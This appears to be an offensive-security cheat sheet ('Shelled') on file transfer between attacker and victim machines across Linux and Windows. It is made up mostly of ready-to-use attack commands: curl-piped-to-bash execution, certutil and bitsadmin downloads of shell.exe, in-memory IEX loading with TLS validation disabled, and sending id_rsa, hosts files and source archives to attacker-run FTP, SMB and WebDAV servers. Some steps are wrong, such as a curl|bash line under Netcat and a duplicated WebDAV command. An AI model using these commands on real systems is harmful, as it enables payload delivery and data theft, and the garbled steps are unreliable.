Shelled

File Transfer

Linux to Linux

Wget/Curl

Description

Two of the most common utilities in Linux distributions to interact with web applications are `wget` and `curl`. These tools are installed on many Linux distributions.

Step 1 - Machine 1

python3 -m http.server 8000

Step 2.1 - Machine 2 Wget

wget http://{IP}:8000/LinEnum.sh -O /tmp/LinEnum.sh

Step 2.2 - Machine 2 cURL

curl http://{IP}:8000/LinEnum.sh -o /tmp/LinEnum.sh

Resources

Description

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connection using TCP or UDP. It was released in 1995 and hasn't been maintained despite its popularity. In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine

Step 1 - Machine 1

nc -l -p 8000 > LinEnum.sh

Step 2 - Machine 2

We will connect to the victim machine on port 8000 using netcat and send the LinEnum.sh file as input to netcat. The `-q 0` will tell netcat to close the connection once it finishes. That way, we'll know when the file transfer was complete.

curl http://{IP}:8000/LinEnum.sh | bash

Resources

Ncat

Description

The computer networking utility tool Netcat (often abbreviated to nc) was released in 1995 and hasn't been maintained despite its popularity. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.

In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine

Step 1 - Machine 1

The `--recv-only` flag is used to close the connection once the file transfer is finished.

ncat -l -p 8000 --recv-only > LinEnum.sh

Step 2 - Machine 2

The `--send-only` flag is used to cause Ncat to quit when its input runs out.

ncat --send-only {IP} 8000 < LinEnum.sh

Resources

SSH

Description

SSH comes with an SCP utility for remote file transfer. We can setup an SSH server on our attacker machine and use the SCP utility to transfer files.

Step 1 - Machine 1

sudo systemctl enable ssh

Step 2 - Machine 1

sudo systemctl start ssh

Step 3 - Machine 2

scp {USER}@{IP}:{FILE_TO_TRANSFER} {FILE_DESTINATION}

Example

scp Administrator@10.10.138.42:/Users/Administrator/20220623131857_loot.zip .

Resources

Base64

Description

Base64 encoding and decoding has a very limited file size, but is stealthy becasue it doesn't require network communication. We can encode a file with base64, copy the file to our victim machine and decode the base64 to get our file back.

Step 1 - Machine 1

cat id_rsa |base64 -w 0;echo

Step 2 - Machine 2

echo -n 'LS0tLS1CRU...' | base64 -d

Resources

Fileless

Description

Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

Step 1 - Machine 1

python3 -m http.server 8000

Step 2.1 - Machine 2 Bash

curl http://{IP}:8000/LinEnum.sh | bash

Step 2.2 - Machine 2 Python

curl http://{IP}:8000/helloworld.py | python3

Resources

PHP

Description

We can use a simple PHP webserver to transfer files

Step 1 - Machine 1

php -S 0.0.0.0:8000

Step 2 - Machine 2

wget http://{IP}:8000/{FILE}

Resources

Python2

Description

We can use a simple Python webserver to transfer filess

Step 1 - Machine 1

python2.7 -m SimpleHTTPServer

Step 2 - Machine 2

wget http://{IP}:8000/{FILE}

Resources

Python3

Description

WWe can use a simple Python webserver to transfer files

Step 1 - Machine 1

python3 -m http.server 8000

Step 2 - Machine 2

wget http://{IP}:8000/{FILE}

Resources

Ruby

Description

We can use a simple Ruby webserver to transfer files

Step 1 - Machine 1

ruby -run -ehttpd . -p8000

Step 2 - Machine 2

wget http://{IP}:8000/{FILE}

Resources

Linux to Windows

Bitsadmin

Description

Used for managing background intelligent transfer

Step 1 - Linux

python3 -m http.server 8000

Step 2 - Windows

bitsadmin.exe /transfer /Download /priority Foreground http://{IP}/shell.exe c:\Users\thm\Desktop\shell.exe

Resources

Certutil

Description

Windows binary used for handling certificates

Step 1 - Linux

python3 -m http.server 8000

Step 2 - Windows

certutil.exe -urlcache -split -f http://{IP}:8000/sharphound.exe sharphound.exe

Resources

FTP

Description

We can setup an FTP server using `pyftpdlib` on our attacker machine to transfer files.

Step 1 - Linux

sudo pip3 install pyftpdlib

Step 2 - Linux

By default, `pyftpdlib` uses port 2121. We can specify port 21 if prefered.

sudo python3 -m pyftpdlib --port 21

Step 3 - Windows

(New-Object Net.WebClient).DownloadFile('ftp://{IP}/file.txt', 'ftp-file.txt')

Resources

PowerShell DownloadFile

Description

PowerShell offers many file transfer options. The following methods from the System.Net.WebClient class can be used to download a file over HTTP, HTTPS, or FTP.

OpenRead
OpenReadAsync
DownloadData
DownloadDataAsync
DownloadFile
DownloadFileAsync
DownloadString
DownloadStringAsync

Step 1 - Linux

python3 -m http.server 8000

Step 2 - Windows

(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

Resources

PowerShell WebRequest

Description

From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available, but is noticeably slower at downloading files. You can use the aliases `iwr`, `curl`, and `wget` instead of the `Invoke-WebRequest` full name.

Step 1 - Linux

python3 -m http.server 8000

Step 2.1 - Windows

Invoke-WebRequest -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'

Step 2.2 - Windows

wget 'http://{IP}:8000/shell.exe'

Step 2.3 - Windows

curl 'http://{IP}:8000/shell.exe' -o shell.exe

Step 2.4 - Windows

iwr -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'

Resources

PowerShell Base64

Description

We can encode a file to a base64 string, copy its contents from the terminal and perform the reverse operation, decoding the file in the original content. This method is not always possible to use. cmd.exe has a maximum string length of 8191 characters. Also, a web shell may error if you attept to send extreamly large strings.

Step 1 - Linux

cat id_rsa | base64 -w 0;echo

Step 2 - Windows

[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1...))

Resources

PowerShell Fileless

Description

Fileless attacks work by using some operating system functions to download the payload anad execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX.

Step 1 - Linux

python3 -m http.server 8000

Step 2 - Windows

iex(New-Object Net.WebClient).DownloadString('http://{IP}:8000/shell.exe')

Resources

SMB

Description

We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine.

Step 1 - Linux

smbserver.py kali .

Step 2 - Windows

copy \\{attackerIP}\kali\{file} .

Resources

SMB Authenticated

Description

New versions of Windows block unauthenticated guest access. You will receive the following error when trying to copy files from an SMB share in an unauthenticated manner: `You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.`

To transfer files in this scenario, we can set a username and password using our Impacket SMB server and mount the SMB server on our Windows target machine.

Step 1 - Linux

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Step 2 - Windows

net use n: \\192.168.220.133\share /user:test test

Step 3 - Windows

copy n:\nc.exe

Resources

XFreeRDP

Description

You can mount your drive to the VM and access is from `This PC`

Step 1 - Linux

xfreerdp /u:thm /p:Password /v:10.10.123.123 /workspace /home-drive

Resources

Explorer Error

Description

When trying to download a file, you may come across the following error: `The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.`

This error is caused due to when Internet Explorer first-launch configuration has not been completed, which prevents the download.

This error can be bypassed with the `-UseBasicParsing` flag.

Step 1 - Linux

python3 -m http.server 8000

Step 2 - Windows

Invoke-WebRequest https://{IP}/shell.exe -UseBasicParsing | IEX

Resources

SSL&TLS Error

Description

When downloading a file, you may come across this error: `Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."`

This error occurs because the certificate is not trusted. We can bypass this error with the following command:

Step 1 - Linux

python3 -m http.server 8000

Step 2 - Windows

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Resources

Windows to Linux

FTP

Description

We can use PowerShell or the FTP client to upload files to an FTP server.

Step 1 - Linux

Using the Python module `pyftpdlib`, we need to specify the option `--write` to allow clients to upload files to our attacker machine.

sudo python3 -m pyftpdlib --port 21 --write

Step 2 - Windows

(New-Object Net.WebClient).UploadFile('ftp://{IP}/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

Resources

Base64

Description

We can use base64 to encode a file and copy the base64 to our attacker machine to decode it.

Step 1 - Windows

[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

Step 2 - Linux

echo IyBDb3B5cm... | base64 -d

Resources

SMB

Description

We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine and upload file to it.

Step 1 - Linux

smbserver.py -smb2support test $(pwd)

Step 2 - Windows

copy {FILE_TO_COPY} \\{ATTACKER_IP}\test

Resources

SMB over HTTP

Description

Companies usually allow outbound traffic using HTTP (TCP/80) and HTTPS (TCP/443) protocols. Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.

An alternative is to run SMB over HTTP with WebDAV. WebDAV is an extension of HTTP, the protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.

When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.

Step 1 - Linux

To setup our WebDAV server, we need to install two Python modules, `wsgidav` and `cheroot`.

sudo pip install wsgidav cheroot

Step 2 - Linux

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Step 3 - Windows

Connect to the WebDAV share.

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Step 4 - Windows

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\

Resources